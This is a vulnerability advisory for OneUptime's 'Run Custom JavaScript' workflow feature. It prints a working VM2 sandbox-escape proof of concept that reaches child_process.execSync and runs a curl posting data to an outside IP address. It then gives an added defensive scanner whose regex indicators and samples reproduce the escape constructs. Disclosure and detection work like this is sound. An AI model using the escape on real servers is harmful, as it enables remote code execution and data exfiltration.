### Summary
OneUptime's integration of the VM2 library for its "Run Custom JavaScript" functionality introduces a remote code execution vulnerability via a Node.js sandbox escape, allowing unauthorized execution of server-side code.
The vulnerability exists within the "Run Custom JavaScript" component of workflows, which allows users to run arbitrary JavaScript code. The flaw is triggered when an attacker creates a workflow that includes the "Run Custom JavaScript" component and adds code that escapes the VM2 library's Node.js sandbox.
### PoC
[PoC video](https://www.youtube.com/embed/w5-Ouhx4F_U?si=OV-9l32QtHCfY66L)
Here is the code that was utilized in the sandbox escape:
```
cmd = "curl 192.168.19.133:1337 -d 'pwnd by jakesss'";
async function fn() {
    (function stack() {
        new Error().stack;
        stack();
    })();
}
p = fn();
p.constructor = {
    [Symbol.species]: class FakePromise {
        constructor(executor) {
            executor(
                (x) => x,
                (err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync(cmd); }
            )
        }
    }
};
return p.then();
```
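For defenders reviewing workflows already stored in an instance, the following added example (not OneUptime's code and not part of the original advisory) scans "Run Custom JavaScript" bodies for the constructs the PoC above relies on. The record fields `id` and `code` and the sample workflows are assumptions constructed for the demonstration; the patterns are heuristics for triage, not a control that prevents an escape.

```javascript
// Added example: heuristic triage of stored workflow scripts.
// Indicator patterns come from the PoC on this page; the workflow records
// and field names (id, code) are constructed, not OneUptime's schema.
const INDICATORS = [
  { id: "function-constructor-chain", re: /\.constructor\s*\.\s*constructor\s*\(/ },
  { id: "species-override", re: /Symbol\s*\.\s*species/ },
  { id: "host-process-access", re: /return\s+process\b/ },
  { id: "main-module-require", re: /mainModule\s*\.\s*require/ },
  { id: "child-process", re: /child_process/ },
  { id: "error-stack-recursion", re: /new\s+Error\s*\(\s*\)\s*\.\s*stack/ },
];

// Collapse adjacent string concatenation so 'child_' + 'process' still matches.
function normalize(source) {
  return source.replace(/(['"`])\s*\+\s*(['"`])/g, "");
}

function scanScript(source) {
  const text = normalize(source);
  const hits = INDICATORS.filter((i) => i.re.test(text)).map((i) => i.id);
  // A single indicator also occurs in benign code (Symbol.species, for one).
  // The PoC pairs a pivot to the host Function constructor with a route to
  // command execution, so that combination is ranked highest.
  const pivot = hits.includes("function-constructor-chain");
  const exec = ["host-process-access", "main-module-require", "child-process"]
    .some((id) => hits.includes(id));
  const severity = pivot && exec ? "high" : hits.length > 0 ? "review" : "none";
  return { hits, severity };
}

function scanWorkflows(workflows) {
  return workflows
    .map((w) => ({ id: w.id, ...scanScript(w.code) }))
    .filter((r) => r.severity !== "none");
}

// Constructed sample records for the demonstration.
const SAMPLE_WORKFLOWS = [
  { id: "wf-1", code: "return { total: args.items.length };" },
  { id: "wf-2", code: "(err) => err.constructor.constructor('return process')()" +
      ".mainModule.require('child_' + 'process')" },
  { id: "wf-3", code: "class L extends Array { static get [Symbol.species]() { return Array; } }" },
];

console.log(scanWorkflows(SAMPLE_WORKFLOWS));
```

A match is a lead for reviewing who authored the workflow and when, not proof of compromise, and a script with no matches is not thereby shown to be safe.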